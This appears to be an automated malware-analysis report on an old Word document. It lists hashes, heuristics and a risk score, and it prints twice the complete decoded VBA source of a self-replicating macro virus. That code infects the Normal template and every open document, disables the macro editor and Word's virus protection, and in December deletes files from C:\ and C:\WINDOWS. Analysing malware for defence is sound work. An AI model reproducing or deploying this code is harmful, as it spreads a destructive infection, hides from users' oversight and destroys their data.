Office (OLE) malware analysis — malicious · bda3e75886d55b5a

MALICIOUS

Office (OLE)

33.5 KB Created: 2001-01-09 13:13:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 4bb8a20f300555311069446ebc024b32 SHA-1: 5ef557baa8b19f1a454eaa643bfadfbc73bdb95f SHA-256: bda3e75886d55b5afd484828a574a25e759d12cf83fb294d24d3150c365a4c46

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The AutoOpen and AutoExec macros, along with the clascopy subroutine, indicate an intent to replicate the macro code to other documents. The presence of these self-replicating macros suggests a mechanism for spreading or maintaining persistence, although the specific payload or execution method is not fully detailed in the provided script excerpt.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4032 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4032 bytes
SHA-256: `4de58211d07bf85c5658c55dda4609ea2c933415e2309b16a54eba4a2e84f011`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1HNormal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Sigma" Attribute VB_Name = "Sigma1" 'Copyright(c) 2000 Puerto Princesa City. Sub AutoOpen() On Error Resume Next Call clascopy End Sub Sub AutoExec() On Error Resume Next Call clascopy End Sub Sub FileSaveAs() On Error Resume Next Call clascopy Dialogs(wdDialogFileSaveAs).Show End Sub Sub FileOpen() On Error Resume Next Dialogs(wdDialogFileOpen).Show Call clascopy End Sub Sub FileSave() On Error Resume Next Call clascopy End Sub Sub FileNew() On Error Resume Next Dialogs(wdDialogFileNew).Show Call clascopy End Sub Sub clascopy() On Error Resume Next Call stealth infected = False For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1 modname = NormalTemplate.VBProject.VBComponents(A_A).Name If modname = "Sigma" Then infected = True If (modname <> "Sigma") And (modname <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems End If Next A_A For Each documentopen In Documents Docinfected = False With documentopen For Sigmaclaw = documentopen.VBProject.VBComponents.Count To 1 Step -1 modname = documentopen.VBProject.VBComponents(Sigmaclaw).Name If modname = "Sigma" Then Docinfected = True If (modname <> "Sigma") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then Application.OrganizerDelete Source:=documentopen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems End If Next Sigmaclaw If Docinfected = False Then e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e) documentopen.VBProject.VBComponents.Add(1).Name = "Sigma" documentopen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode ActiveDocument.Save End If End With Next documentopen If infected = False Then e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e) NormalTemplate.VBProject.VBComponents.Add(1).Name = "Sigma" NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode NormalTemplate.Save End If End Sub Sub stealth() On Error Resume Next CustomizationContext = NormalTemplate FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable FindKey(BuildKeyCode(wdKeyBreak, wdKeyCtrl)).Disable CommandBars("tools").Reset CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize CommandBars("Tools").Controls("Macro").Enabled = False CommandBars("Tools").Controls("Customize...").Enabled = False CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False ActiveDocument.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) .Comments = "Puerto Princesa - the cleanest & greenest city in the PHILIPPINES" .Execute End With If Month(Date) = 12 Then Kill "C:\." Kill "C:\WINDOWS\." End If End Sub

SHA-256: 4de58211d07bf85c5658c55dda4609ea2c933415e2309b16a54eba4a2e84f011

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HNormal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Sigma"


Attribute VB_Name = "Sigma1"
'Copyright(c) 2000 Puerto Princesa City.
Sub AutoOpen()
    On Error Resume Next
    Call clascopy
End Sub
Sub AutoExec()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Call clascopy
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileOpen()
    On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    Call clascopy
End Sub
Sub FileSave()
    On Error Resume Next
    Call clascopy
End Sub
Sub FileNew()
    On Error Resume Next
    Dialogs(wdDialogFileNew).Show
    Call clascopy
End Sub
Sub clascopy()
    On Error Resume Next
    Call stealth
    infected = False
    For A_A = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        modname = NormalTemplate.VBProject.VBComponents(A_A).Name
        If modname = "Sigma" Then infected = True
        If (modname <> "Sigma") And (modname <> "ThisDocument") Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
        End If
    Next A_A
    For Each documentopen In Documents
        Docinfected = False
        With documentopen
            For Sigmaclaw = documentopen.VBProject.VBComponents.Count To 1 Step -1
                modname = documentopen.VBProject.VBComponents(Sigmaclaw).Name
                If modname = "Sigma" Then Docinfected = True
                If (modname <> "Sigma") And (modname <> "ThisDocument") And (modname <> "Reference to Normal") Then
                    Application.OrganizerDelete Source:=documentopen.FullName, Name:=modname, Object:=wdOrganizerObjectProjectItems
                End If
            Next Sigmaclaw
            If Docinfected = False Then
                e = NormalTemplate.VBProject.VBComponents(2).CodeModule.CountOfLines
                vircode = NormalTemplate.VBProject.VBComponents(2).CodeModule.Lines(1, e)
                documentopen.VBProject.VBComponents.Add(1).Name = "Sigma"
                documentopen.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
                ActiveDocument.Save
            End If
        End With
    Next documentopen
    If infected = False Then
        e = ActiveDocument.VBProject.VBComponents(2).CodeModule.CountOfLines
        vircode = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(1, e)
        NormalTemplate.VBProject.VBComponents.Add(1).Name = "Sigma"
        NormalTemplate.VBProject.VBComponents(2).CodeModule.InsertLines 1, vircode
        NormalTemplate.Save
    End If
End Sub
Sub stealth()
    On Error Resume Next
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyBreak, wdKeyCtrl)).Disable
    CommandBars("tools").Reset
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Enabled = False
    CommandBars("Tools").Controls("Customize...").Enabled = False
    CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    With Dialogs(wdDialogFileSummaryInfo)
        .Comments = "Puerto Princesa - the cleanest & greenest city in the PHILIPPINES"
        .Execute
    End With
    If Month(Date) = 12 Then
        Kill "C:\*.*"
        Kill "C:\WINDOWS\*.*"
    End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.